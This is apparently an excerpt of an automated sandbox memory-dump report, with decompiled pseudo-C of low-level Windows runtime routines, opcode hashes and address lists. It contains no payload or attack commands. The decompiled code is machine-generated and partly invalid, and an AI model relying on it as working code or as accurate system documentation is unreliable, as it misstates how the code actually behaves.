0x010c8611 0x00000000 0x010c8611 0x010c85f3 0x00000000 0x010c85f3 0x010c8619 0x010c861e 0x010c861e 0x010c8621 0x010c8622 0x010c8623 0x010c8625 0x010c862c 0x00000000 0x010c873d 0x00000000 0x010c873d 0x010c8737 0x010c850f 0x010c8512 0x00000000 0x010c8512 0x00000000 0x010c84d6

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: b72d887bfc3f08ff97728bf834d74899cf4edbfb5ce6aae9650d7349909ce134 Instruction ID: 2dc49b896f7dc3a7cf827e76e9a35152c07a4b27f9b13fe3d2ea7025997530cd Opcode Fuzzy Hash: b72d887bfc3f08ff97728bf834d74899cf4edbfb5ce6aae9650d7349909ce134 Instruction Fuzzy Hash: EBB15BB0E0020ADFDB29DFA9C984AEDFBB5BF48704F10812EE555AB245D770A941CF54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E010E513A(intOrPtr __ecx, void* __edx) { signed int _v8; signed char _v16; intOrPtr _v20; intOrPtr _v24; char _v28; signed int _v32; signed int _v36; signed int _v40; intOrPtr _v44; intOrPtr _v48; char _v63; char _v64; signed int _v72; signed int _v76; signed int _v80; signed int _v84; signed int _v88; signed char* _v92; signed int _v100; signed int _v104; char _v105; void* __ebx; void* __edi; void* __esi; void* _t157; signed int _t159; signed int _t160; unsigned int* _t161; intOrPtr _t165; signed int _t172; signed char* _t181; intOrPtr _t189; intOrPtr* _t200; signed int _t202; signed int _t203; char _t204; signed int _t207; signed int _t208; void* _t209; intOrPtr _t210; signed int _t212; signed int _t214; signed int _t221; signed int _t222; signed int _t226; intOrPtr* _t232; signed int _t233; signed int _t234; intOrPtr _t237; intOrPtr _t238; intOrPtr _t240; void* _t245; signed int _t246; signed int _t247; void* _t248; void* _t251; void* _t252; signed int _t253; signed int _t255; signed int _t256; _t255 = (_t253 & 0xfffffff8) - 0x6c; _v8 = *0x11ad360 ^ _t255; _v32 = _v32 & 0x00000000; _t251 = __edx; _t237 = __ecx; _t212 = 6; _t245 = &_v84; _t207 = *((intOrPtr*)(__ecx + 0x48)); _v44 = *((intOrPtr*)(__edx + 0xc8)); _v48 = __ecx; _v36 = _t207; _t157 = memset(_t245, 0, _t212 << 2); _t256 = _t255 + 0xc; _t246 = _t245 + _t212; if(_t207 == 2) { _t247 = *(_t237 + 0x60); _t208 = *(_t237 + 0x64); _v63 = *((intOrPtr*)(_t237 + 0x4c)); _t159 = *((intOrPtr*)(_t237 + 0x58)); _v104 = _t159; _v76 = _t159; _t160 = *((intOrPtr*)(_t237 + 0x5c)); _v100 = _t160; _v72 = _t160; L19: _v80 = _t208; _v84 = _t247; L8: _t214 = 0; if( *(_t237 + 0x74) > 0) { _t82 = _t237 + 0x84; // 0x124 _t161 = _t82; _v92 = _t161; while( *_t161 >> 0x1f != 0) { _t200 = _v92; if( *_t200 == 0x80000000) { break; } _t214 = _t214 + 1; _t161 = _t200 + 0x10; _v92 = _t161; if(_t214 < *(_t237 + 0x74)) { continue; } goto L9; } _v88 = _t214 << 4; _v40 = _t237 + *((intOrPtr*)(_v88 + _t237 + 0x78)); _t165 = 0; asm("adc eax, [ecx+edx+0x7c]"); _v24 = _t165; _v28 = _v40; _v20 = *((intOrPtr*)(_v88 + _t237 + 0x80)); _t221 = _v40; _v16 = *_v92; _v32 = &_v28; if( *(_t237 + 0x4e) >> 0xf == 0) { goto L9; } _t240 = _v48; if( *_v92 != 0x80000000) { goto L9; } *((intOrPtr*)(_t221 + 8)) = 0; *((intOrPtr*)(_t221 + 0xc)) = 0; *((intOrPtr*)(_t221 + 0x14)) = 0; *((intOrPtr*)(_t221 + 0x10)) = _v20; _t226 = 0; _t181 = _t251 + 0x66; _v88 = 0; _v92 = _t181; do { if( *((char*)(_t181 - 2)) == 0) { goto L31; } _t226 = _v88; if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) { _t181 = E010FD0F0(1, _t226 + 0x20, 0); _t226 = _v40; *(_t226 + 8) = _t181; *((intOrPtr*)(_t226 + 0xc)) = 0; L34: if(_v44 == 0) { goto L9; } _t210 = _v44; _t127 = _t210 + 0x1c; // 0x1c _t249 = _t127; E010D2280(_t181, _t127); *(_t210 + 0x20) = *( *[fs:0x18] + 0x24); _t185 = *((intOrPtr*)(_t210 + 0x94)); if( *((intOrPtr*)(_t210 + 0x94)) != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185); } _t189 = L010D4620(_t226, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10); *((intOrPtr*)(_t210 + 0x94)) = _t189; if(_t189 != 0) { *((intOrPtr*)(_t189 + 8)) = _v20; *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16; _t232 = *((intOrPtr*)(_t210 + 0x94)); *_t232 = _t232 + 0x10; *(_t232 + 4) = *(_t232 + 4) & 0x00000000; E010FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20); _t256 = _t256 + 0xc; } *(_t210 + 0x20) = *(_t210 + 0x20) & 0x00000000; E010CFFB0(_t210, _t249, _t249); _t222 = _v76; _t172 = _v80; _t208 = _v84; _t247 = _v88; L10: _t238 = *((intOrPtr*)(_t251 + 0x1c)); _v44 = _t238; if(_t238 != 0) { *0x11ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32, *((intOrPtr*)(_t251 + 0x20))); _v44(); } _pop(_t248); _pop(_t252); _pop(_t209); return E010FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252); } _t181 = _v92; L31: _t226 = _t226 + 1; _t181 = &(_t181[0x18]); _v88 = _t226; _v92 = _t181; } while (_t226 < 4); goto L34; } L9: _t172 = _v104; _t222 = _v100; goto L10; } _t247 = _t246 | 0xffffffff; _t208 = _t247; _v84 = _t247; _v80 = _t208; if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) { _t233 = _v72; _v105 = _v64; _t202 = _v76; } else { _t204 = *((intOrPtr*)(_t251 + 0x4d)); _v105 = 1; if(_v63 <= _t204) { _v63 = _t204; } _t202 = _v76 | *(_t251 + 0x40); _t233 = _v72 | *(_t251 + 0x44); _t247 = *(_t251 + 0x38); _t208 = *(_t251 + 0x3c); _v76 = _t202; _v72 = _t233; _v84 = _t247; _v80 = _t208; } _v104 = _t202; _v100 = _t233; if( *((char*)(_t251 + 0xc4)) != 0) { _t237 = _v48; _v105 = 1; if(_v63 <= *((intOrPtr*)(_t251 + 0xc5))) { _v63 = *((intOrPtr*)(_t251 + 0xc5)); _t237 = _v48; } _t203 = _t202 | *(_t251 + 0xb8); _t234 = _t233 | *(_t251 + 0xbc); _t247 = _t247 & *(_t251 + 0xb0); _t208 = _t208 & *(_t251 + 0xb4); _v104 = _t203; _v76 = _t203; _v100 = _t234; _v72 = _t234; _v84 = _t247; _v80 = _t208; } if(_v105 == 0) { _v36 = _v36 & 0x00000000; _t208 = 0; _t247 = 0; *(_t237 + 0x74) = *(_t237 + 0x74) & 0; goto L19; } else { _v36 = 1; goto L8; } } 0x010e5142 0x010e514c 0x010e5150 0x010e5157 0x010e5159 0x010e515e 0x010e5165 0x010e5169 0x010e516c 0x010e5172 0x010e5176 0x010e517a 0x010e517a 0x010e517a 0x010e517f 0x01126d8b 0x01126d8e 0x01126d91 0x01126d95 0x01126d98 0x01126d9c 0x01126da0 0x01126da3 0x01126da7 0x01126e26 0x01126e26 0x01126e2a 0x010e51f9 0x010e51f9 0x010e51fe 0x01126e33 0x01126e33 0x01126e39 0x01126e3d 0x01126e46 0x01126e50 0x00000000 0x00000000 0x01126e52 0x01126e53 0x01126e56 0x01126e5d 0x00000000 0x00000000 0x00000000 0x01126e5f 0x01126e67 0x01126e77 0x01126e7f 0x01126e80 0x01126e88 0x01126e90 0x01126e9f 0x01126ea5 0x01126ea9 0x01126eb1 0x01126ebf 0x00000000 0x00000000 0x01126ecf 0x01126ed3 0x00000000 0x00000000 0x01126edb 0x01126ede 0x01126ee1 0x01126ee8 0x01126eeb 0x01126eed 0x01126ef0 0x01126ef4 0x01126ef8 0x01126efc 0x00000000 0x00000000 0x01126f0d 0x01126f11 0x01126f32 0x01126f37 0x01126f3b 0x01126f3e 0x01126f41 0x01126f46 0x00000000 0x00000000 0x01126f4c 0x01126f50 0x01126f50 0x01126f54 0x01126f62 0x01126f65 0x01126f6d 0x01126f7b 0x01126f7b 0x01126f93 0x01126f98 0x01126fa0 0x01126fa6 0x01126fb3 0x01126fb6 0x01126fbf 0x01126fc1 0x01126fd5 0x01126fda 0x01126fda 0x01126fdd 0x01126fe2 0x01126fe7 0x01126feb 0x01126fef 0x01126ff3 0x010e520c 0x010e520c 0x010e520f 0x010e5215 0x010e5234 0x010e523a 0x010e523a 0x010e5244 0x010e5245 0x010e5246 0x010e5251 0x010e5251 0x01126f13 0x01126f17 0x01126f17 0x01126f18 0x01126f1b 0x01126f1f 0x01126f23 0x00000000 0x01126f28 0x010e5204 0x010e5204 0x010e5208 0x00000000 0x010e5208 0x010e5185 0x010e5188 0x010e518a 0x010e518e 0x010e5195 0x01126db1 0x01126db5 0x01126db9 0x010e519b 0x010e519b 0x010e519e 0x010e51a7 0x010e51a9 0x010e51a9 0x010e51b5 0x010e51b8 0x010e51bb 0x010e51be 0x010e51c1 0x010e51c5 0x010e51c9 0x010e51cd 0x010e51cd 0x010e51d8 0x010e51dc 0x010e51e0 0x01126dcc 0x01126dd0 0x01126dd5 0x01126ddd 0x01126de1 0x01126de1 0x01126de5 0x01126deb 0x01126df1 0x01126df7 0x01126dfd 0x01126e01 0x01126e05 0x01126e09 0x01126e0d 0x01126e11 0x01126e11 0x010e51eb 0x01126e1a 0x01126e1f 0x01126e21 0x01126e23 0x00000000 0x010e51f1 0x010e51f1 0x00000000 0x010e51f1

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 50948901d7136c28563c8cbaa9977ab7d9354afa81ccdf162e6b4838a8485e32 Instruction ID: 1ae946a2647ece1b121fd8c74d4c0b99fd70d59f656f68530c9da279e3679830 Opcode Fuzzy Hash: 50948901d7136c28563c8cbaa9977ab7d9354afa81ccdf162e6b4838a8485e32 Instruction Fuzzy Hash: 9DC101755083818FD358CF28C580A6AFBE1BF89308F144A6EF9D98B392D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%

E010E03E2(signed int __ecx, signed int __edx) { signed int _v8; signed int _v12; signed int _v16; signed int _v20; signed int _v24; signed int _v28; signed int _v32; signed int _v36; intOrPtr _v40; signed int _v44; signed int _v48; char _v52; char _v56; char _v64; void* __ebx; void* __edi; void* __esi; signed int _t56; signed int _t58; char* _t64; intOrPtr _t65; signed int _t74; signed int _t79; char* _t83; intOrPtr _t84; signed int _t93; signed int _t94; signed char* _t95; signed int _t99; signed int _t100; signed char* _t101; signed int _t105; signed int _t119; signed int _t120; void* _t122; signed int _t123; signed int _t127; _v8 = *0x11ad360 ^ _t127; _t119 = __ecx; _t105 = __edx; _t118 = 0; _v20 = __edx; _t120 = *(__ecx + 0x20); if(E010E0548(__ecx, 0) != 0) { _t56 = 0xc000022d; L23: return E010FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120); } else { _v12 = _v12 | 0xffffffff; _t58 = _t120 + 0x24; _t109 = *(_t120 + 0x18); _t118 = _t58; _v16 = _t58; E010CB02A( *(_t120 + 0x18), _t118, 0x14a5); _v52 = 0x18; _v48 = 0; 0x840 = 0x40; if( *0x11a7c1c != 0) { } _v40 = 0x840; _v44 = _t105; _v36 = 0; _v32 = 0; if(E010D7D50() != 0) { _t64 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t64 = 0x7ffe0384; } if( *_t64 != 0) { _t65 = *[fs:0x30]; __eflags = *(_t65 + 0x240) & 0x00000004; if(( *(_t65 + 0x240) & 0x00000004) != 0) { _t100 = E010D7D50(); __eflags = _t100; if(_t100 == 0) { _t101 = 0x7ffe0385; } else { _t101 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } __eflags = *_t101 & 0x00000020; if(( *_t101 & 0x00000020) != 0) { _t118 = _t118 | 0xffffffff; _t109 = 0x1485; E01137016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0); } } } _t105 = 0; while(1) { _push(0x60); _push(5); _push( &_v64); _push( &_v52); _push(0x100021); _push( &_v12); _t122 = E010F9830(); if(_t122 >= 0) { break; } __eflags = _t122 - 0xc0000034; if(_t122 == 0xc0000034) { L38: _t120 = 0xc0000135; break; } __eflags = _t122 - 0xc000003a; if(_t122 == 0xc000003a) { goto L38; } __eflags = _t122 - 0xc0000022; if(_t122 != 0xc0000022) { break; } __eflags = _t105; if(__eflags != 0) { break; } _t109 = _t119; _t99 = E011369A6(_t119, __eflags); __eflags = _t99; if(_t99 == 0) { break; } _t105 = _t105 + 1; } if( !_t120 >= 0) { L22: _t56 = _t120; goto L23; } if( *0x11a7c04 != 0) { _t118 = _v12; _t120 = E0113A7AC(_t119, _t118, _t109); __eflags = _t120; if(_t120 >= 0) { goto L10; } __eflags = *0x11a7bd8; if( *0x11a7bd8 != 0) { L20: if(_v12 != 0xffffffff) { _push(_v12); E010F95D0(); } goto L22; } } L10: _push(_v12); _t105 = _t119 + 0xc; _push(0x1000000); _push(0x10); _push(0); _push(0); _push(0xf); _push(_t105); _t120 = E010F99A0(); if(_t120 < 0) { __eflags = _t120 - 0xc000047e; if(_t120 == 0xc000047e) { L51: _t74 = E01133540(_t120); _t119 = _v16; _t120 = _t74; L52: _t118 = 0x1485; E010BB1E1(_t120, 0x1485, 0, _t119); goto L20; } __eflags = _t120 - 0xc000047f; if(_t120 == 0xc000047f) { goto L51; } __eflags = _t120 - 0xc0000462; if(_t120 == 0xc0000462) { goto L51; } _t119 = _v16; __eflags = _t120 - 0xc0000017; if(_t120 != 0xc0000017) { __eflags = _t120 - 0xc000009a; if(_t120 != 0xc000009a) { __eflags = _t120 - 0xc000012d; if(_t120 != 0xc000012d) { _v28 = _t119; _push( &_v56); _push(1); _v24 = _t120; _push( &_v28); _push(1); _push(2); _push(0xc000007b); _t79 = E010FAAF0(); __eflags = _t79; if(_t79 >= 0) { __eflags = *0x11a8474 - 3; if( *0x11a8474 != 3) { *0x11a79dc = *0x11a79dc + 1; } } } } } goto L52; } if(E010D7D50() != 0) { _t83 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t83 = 0x7ffe0384; } if( *_t83 != 0) { _t84 = *[fs:0x30]; __eflags = *(_t84 + 0x240) & 0x00000004; if(( *(_t84 + 0x240) & 0x00000004) != 0) { _t94 = E010D7D50(); __eflags = _t94; if(_t94 == 0) { _t95 = 0x7ffe0385; } else { _t95 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } __eflags = *_t95 & 0x00000020; if(( *_t95 & 0x00000020) != 0) { E01137016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0); } } } if(( *(_t119 + 0x10) & 0x00000100) == 0) { if( *0x11a8708 != 0) { _t118 = *0x7ffe0330; _t123 = *0x11a7b00; // 0x0 asm("ror esi, cl"); *0x11ab1e0(_v12, _v20, 0x20); _t93 = *(_t123 ^ *0x7ffe0330)(); _t50 = _t93 + 0x3ffffddb; // 0x3ffffddb asm("sbb esi, esi"); _t120 = ~_t50 & _t93; } else { _t120 = 0; } } if( !_t120 >= 0) { L19: _push( *_t105); E010F95D0(); *_t105 = *_t105 & 0x00000000; goto L20; } _t120 = E010C7F65(_t119); if( *((intOrPtr*)(_t119 + 0x60)) != 0) { __eflags = _t120; if(_t120 < 0) { goto L19; } *(_t119 + 0x64) = _v12; goto L22; } goto L19; } } 0x010e03f1 0x010e03f7 0x010e03f9 0x010e03fb 0x010e03fd 0x010e0400 0x010e040a 0x01124c7a 0x010e0537 0x010e0547 0x010e0410 0x010e0410 0x010e0414 0x010e0417 0x010e041a 0x010e0421 0x010e0424 0x010e042b 0x010e043b 0x010e043e 0x010e043f 0x010e043f 0x010e0446 0x010e0449 0x010e044c 0x010e044f 0x010e0459 0x01124c8d 0x010e045f 0x010e045f 0x010e045f 0x010e0467 0x01124c97 0x01124c9d 0x01124ca4 0x01124caa 0x01124caf 0x01124cb1 0x01124cc3 0x01124cb3 0x01124cbc 0x01124cbc 0x01124cc8 0x01124ccb 0x01124cd7 0x01124cda 0x01124cdf 0x01124cdf 0x01124ccb 0x01124ca4 0x010e046d 0x010e046f 0x010e046f 0x010e0471 0x010e0476 0x010e047a 0x010e047b 0x010e0483 0x010e0489 0x010e048d 0x00000000 0x00000000 0x01124ce9 0x01124cef 0x01124d22 0x01124d22 0x00000000 0x01124d22 0x01124cf1 0x01124cf7 0x00000000 0x00000000 0x01124cf9 0x01124cff 0x00000000 0x00000000 0x01124d05 0x01124d07 0x00000000 0x00000000 0x01124d0d 0x01124d0f 0x01124d14 0x01124d16 0x00000000 0x00000000 0x01124d1c 0x01124d1c 0x010e0499 0x010e0535 0x010e0535 0x00000000 0x010e0535 0x010e04a6 0x01124d2c 0x01124d37 0x01124d39 0x01124d3b 0x00000000 0x00000000 0x01124d41 0x01124d48 0x010e0527 0x010e052b 0x010e052d 0x010e0530 0x010e0530 0x00000000 0x010e052b 0x01124d4e 0x010e04ac 0x010e04ac 0x010e04af 0x010e04b2 0x010e04b7 0x010e04b9 0x010e04bb 0x010e04bd 0x010e04bf 0x010e04c5 0x010e04c9 0x01124d53 0x01124d59 0x01124db9 0x01124dba 0x01124dbf 0x01124dc2 0x01124dc4 0x01124dc7 0x01124dce 0x00000000 0x01124dce 0x01124d5b 0x01124d61 0x00000000 0x00000000 0x01124d63 0x01124d69 0x00000000 0x00000000 0x01124d6b 0x01124d6e 0x01124d74 0x01124d76 0x01124d7c 0x01124d7e 0x01124d84 0x01124d89 0x01124d8c 0x01124d8d 0x01124d92 0x01124d95 0x01124d96 0x01124d98 0x01124d9a 0x01124d9f 0x01124da4 0x01124da6 0x01124da8 0x01124daf 0x01124db1 0x01124db1 0x01124daf 0x01124da6 0x01124d84 0x01124d7c 0x00000000 0x01124d74 0x010e04d6 0x01124de1 0x010e04dc 0x010e04dc 0x010e04dc 0x010e04e4 0x01124deb 0x01124df1 0x01124df8 0x01124dfe 0x01124e03 0x01124e05 0x01124e17 0x01124e07 0x01124e10 0x01124e10 0x01124e1c 0x01124e1f 0x01124e35 0x01124e35 0x01124e1f 0x01124df8 0x010e04f1 0x010e04fa 0x01124e3f 0x01124e47 0x01124e5b 0x01124e61 0x01124e67 0x01124e69 0x01124e71 0x01124e73 0x010e0500 0x010e0500 0x010e0500 0x010e04fa 0x010e0508 0x010e051d 0x010e051d 0x010e051f 0x010e0524 0x00000000 0x010e0524 0x010e0515 0x010e0517 0x01124e7a 0x01124e7c 0x00000000 0x00000000 0x01124e85 0x00000000 0x01124e85 0x00000000 0x010e0517

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: c837c16d186cf2cf9701429a11ab136daa8ea46f049b36095a1d868b9da10ce4 Instruction ID: 6fa2a94a2b2351152cfef6d3b798d9044bc54977822c612169b013a31e962b64 Opcode Fuzzy Hash: c837c16d186cf2cf9701429a11ab136daa8ea46f049b36095a1d868b9da10ce4 Instruction Fuzzy Hash: 22917E71F002299FEB359B6DC848BAE7FE0AF01724F050265FA90AB6D5DBB49D50C781

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E010BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) { signed int _v8; char _v1036; signed int _v1040; char _v1048; signed int _v1052; signed char _v1056; void* _v1058; char _v1060; signed int _v1064; void* _v1068; intOrPtr _v1072; void* _v1084; void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr _t70; intOrPtr _t72; signed int _t74; intOrPtr _t77; signed int _t78; signed int _t81; void* _t101; signed int _t102; signed int _t107; signed int _t109; signed int _t110; signed char _t111; signed int _t112; signed int _t113; signed int _t114; intOrPtr _t116; void* _t117; char _t118; void* _t120; char _t121; signed int _t122; signed int _t123; signed int _t125; _t125 = (_t123 & 0xfffffff8) - 0x424; _v8 = *0x11ad360 ^ _t125; _t116 = _a4; _v1056 = _a16; _v1040 = _a24; if(E010C6D30( &_v1048, _a8) < 0) { L4: _pop(_t117); _pop(_t120); _pop(_t101); return E010FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120); } _t70 = _a20; if(_t70 >= 0x3f4) { _t121 = _t70 + 0xc; L19: _t107 = *( *[fs:0x30] + 0x18); __eflags = _t107; if(_t107 == 0) { L60: _t68 = 0xc0000017; goto L4; } _t72 = *0x11a7b9c; // 0x0 _t74 = L010D4620(_t107, _t107, _t72 + 0x180000, _t121); _v1064 = _t74; __eflags = _t74; if(_t74 == 0) { goto L60; } _t102 = _t74; _push( &_v1060); _push(_t121); _push(_t74); _push(2); _push( &_v1048); _push(_t116); _t122 = E010F9650(); __eflags = _t122; if(_t122 >= 0) { L7: _t114 = _a12; __eflags = _t114; if(_t114 != 0) { _t77 = _a20; L26: _t109 = *(_t102 + 4); __eflags = _t109 - 3; if(_t109 == 3) { L55: __eflags = _t114 - _t109; if(_t114 != _t109) { L59: _t122 = 0xc0000024; L15: _t78 = _v1052; __eflags = _t78; if(_t78 != 0) { L010D77F0( *( *[fs:0x30] + 0x18), 0, _t78); } _t68 = _t122; goto L4; } _t110 = _v1056; _t118 = *((intOrPtr*)(_t102 + 8)); _v1060 = _t118; __eflags = _t110; if(_t110 == 0) { L10: _t122 = 0x80000005; L11: _t81 = _v1040; __eflags = _t81; if(_t81 == 0) { goto L15; } __eflags = _t122; if(_t122 >= 0) { L14: *_t81 = _t118; goto L15; } __eflags = _t122 - 0x80000005; if(_t122 != 0x80000005) { goto L15; } goto L14; } __eflags = *((intOrPtr*)(_t102 + 8)) - _t77; if( *((intOrPtr*)(_t102 + 8)) > _t77) { goto L10; } _push( *((intOrPtr*)(_t102 + 8))); _t59 = _t102 + 0xc; // 0xc _push(_t110); L54: E010FF3E0(); _t125 = _t125 + 0xc; goto L11; } __eflags = _t109 - 7; if(_t109 == 7) { goto L55; } _t118 = 4; __eflags = _t109 - _t118; if(_t109 != _t118) { __eflags = _t109 - 0xb; if(_t109 != 0xb) { __eflags = _t109 - 1; if(_t109 == 1) { __eflags = _t114 - _t118; if(_t114 != _t118) { _t118 = *((intOrPtr*)(_t102 + 8)); _v1060 = _t118; __eflags = _t118 - _t77; if(_t118 > _t77) { goto L10; } _push(_t118); _t56 = _t102 + 0xc; // 0xc _push(_v1056); goto L54; } __eflags = _t77 - _t118; if(_t77 != _t118) { L34: _t122 = 0xc0000004; goto L15; } _t111 = _v1056; __eflags = _t111 & 0x00000003; if((_t111 & 0x00000003) == 0) { _v1060 = _t118; __eflags = _t111; if(__eflags == 0) { goto L10; } _t42 = _t102 + 0xc; // 0xc *((intOrPtr*)(_t125 + 0x20)) = _t42; _v1048 = *((intOrPtr*)(_t102 + 8)); _push(_t111); *((short*)(_t125 + 0x22)) = *((intOrPtr*)(_t102 + 8)); _push(0); _push( &_v1048); _t122 = E010F13C0(_t102, _t118, _t122, __eflags); L44: _t118 = _v1072; goto L11; } _t122 = 0x80000002; goto L15; } _t122 = 0xc0000024; goto L44; } __eflags = _t114 - _t109; if(_t114 != _t109) { goto L59; } _t118 = 8; __eflags = _t77 - _t118; if(_t77 != _t118) { goto L34; } __eflags = *((intOrPtr*)(_t102 + 8)) - _t118; if( *((intOrPtr*)(_t102 + 8)) != _t118) { goto L34; } _t112 = _v1056; _v1060 = _t118; __eflags = _t112; if(_t112 == 0) { goto L10; } *_t112 = *((intOrPtr*)(_t102 + 0xc)); *((intOrPtr*)(_t112 + 4)) = *((intOrPtr*)(_t102 + 0x10)); goto L11; } __eflags = _t114 - _t118; if(_t114 != _t118) { goto L59; } __eflags = _t77 - _t118; if(_t77 != _t118) { goto L34; } __eflags = *((intOrPtr*)(_t102 + 8)) - _t118; if( *((intOrPtr*)(_t102 + 8)) != _t118) { goto L34; } _t113 = _v1056; _v1060 = _t118; __eflags = _t113; if(_t113 == 0) { goto L10; } *_t113 = *((intOrPtr*)(_t102 + 0xc)); goto L11; } _t118 = *((intOrPtr*)(_t102 + 8)); __eflags = _t118 - _a20; if(_t118 <= _a20) { _t114 = *(_t102 + 4); _t77 = _t118; goto L26; } _v1060 = _t118; goto L10; } __eflags = _t122 - 0x80000005; if(_t122 != 0x80000005) { goto L15; } L010D77F0( *( *[fs:0x30] + 0x18), 0, _t102); L18: _t121 = _v1060; goto L19; } _push( &_v1060); _push(0x400); _t102 = &_v1036; _push(_t102); _push(2); _push( &_v1048); _push(_t116); _t122 = E010F9650(); if(_t122 >= 0) { __eflags = 0; _v1052 = 0; goto L7; } if(_t122 == 0x80000005) { goto L18; } goto L4; } 0x010bc608 0x010bc615 0x010bc625 0x010bc62d 0x010bc635 0x010bc640 0x010bc680 0x010bc687 0x010bc688 0x010bc689 0x010bc694 0x010bc694 0x010bc642 0x010bc64a 0x010bc697 0x01127a25 0x01127a2b 0x01127a2e 0x01127a30 0x01127bea 0x01127bea 0x00000000 0x01127bea 0x01127a36 0x01127a43 0x01127a48 0x01127a4c 0x01127a4e 0x00000000 0x00000000 0x01127a58 0x01127a5a 0x01127a5b 0x01127a5c 0x01127a5d 0x01127a63 0x01127a64 0x01127a6a 0x01127a6c 0x01127a6e 0x011279cb 0x011279cb 0x011279ce 0x011279d0 0x01127a98 0x01127a9b 0x01127a9b 0x01127a9e 0x01127aa1 0x01127bbe 0x01127bbe 0x01127bc0 0x01127be0 0x01127be0 0x01127a01 0x01127a01 0x01127a05 0x01127a07 0x01127a15 0x01127a15 0x01127a1a 0x00000000 0x01127a1a 0x01127bc2 0x01127bc6 0x01127bc9 0x01127bcd 0x01127bcf 0x011279e6 0x011279e6 0x011279eb 0x011279eb 0x011279ef 0x011279f1 0x00000000 0x00000000 0x011279f3 0x011279f5 0x011279ff 0x011279ff 0x00000000 0x011279ff 0x011279f7 0x011279fd 0x00000000 0x00000000 0x00000000 0x011279fd 0x01127bd5 0x01127bd8 0x00000000 0x00000000 0x01127ba9 0x01127bac 0x01127bb0 0x01127bb1 0x01127bb1 0x01127bb6 0x00000000 0x01127bb6 0x01127aa7 0x01127aaa 0x00000000 0x00000000 0x01127ab2 0x01127ab3 0x01127ab5 0x01127aec 0x01127aef 0x01127b25 0x01127b28 0x01127b62 0x01127b64 0x01127b8f 0x01127b92 0x01127b96 0x01127b98 0x00000000 0x00000000 0x01127b9e 0x01127b9f 0x01127ba3 0x00000000 0x01127ba3 0x01127b66 0x01127b68 0x01127ae2 0x01127ae2 0x00000000 0x01127ae2 0x01127b6e 0x01127b72 0x01127b75 0x01127b81 0x01127b85 0x01127b87 0x00000000 0x00000000 0x01127b31 0x01127b34 0x01127b3c 0x01127b45 0x01127b46 0x01127b4f 0x01127b51 0x01127b57 0x01127b59 0x01127b59 0x00000000 0x01127b59 0x01127b77 0x00000000 0x01127b77 0x01127b2a 0x00000000 0x01127b2a 0x01127af1 0x01127af3 0x00000000 0x00000000 0x01127afb 0x01127afc 0x01127afe 0x00000000 0x00000000 0x01127b00 0x01127b03 0x00000000 0x00000000 0x01127b05 0x01127b09 0x01127b0d 0x01127b0f 0x00000000 0x00000000 0x01127b18 0x01127b1d 0x00000000 0x01127b1d 0x01127ab7 0x01127ab9 0x00000000 0x00000000 0x01127abf 0x01127ac1 0x00000000 0x00000000 0x01127ac3 0x01127ac6 0x00000000 0x00000000 0x01127ac8 0x01127acc 0x01127ad0 0x01127ad2 0x00000000 0x00000000 0x01127adb 0x00000000 0x01127adb 0x011279d6 0x011279d9 0x011279dc 0x01127a91 0x01127a94 0x00000000 0x01127a94 0x011279e2 0x00000000 0x011279e2 0x01127a74 0x01127a7a 0x00000000 0x00000000 0x01127a8a 0x01127a21 0x01127a21 0x00000000 0x01127a21 0x010bc650 0x010bc651 0x010bc656 0x010bc65c 0x010bc65d 0x010bc663 0x010bc664 0x010bc66a 0x010bc66e 0x011279c5 0x011279c7 0x00000000 0x011279c7 0x010bc67a 0x00000000 0x00000000 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2a6aacf43dee15ac071a2332ff09a101d70f05f816c4508d89502a55fcca240d Instruction ID: f663210e012d0b94035c71e870153c30711a17b8024b7cbb899ff46047e06155 Opcode Fuzzy Hash: 2a6aacf43dee15ac071a2332ff09a101d70f05f816c4508d89502a55fcca240d Instruction Fuzzy Hash: 658195756043118BDB2ACE58C881B7B77E4FBA4364F19486EEE459B281E330DD50CB92

Uniqueness

Uniqueness Score: -1.00%

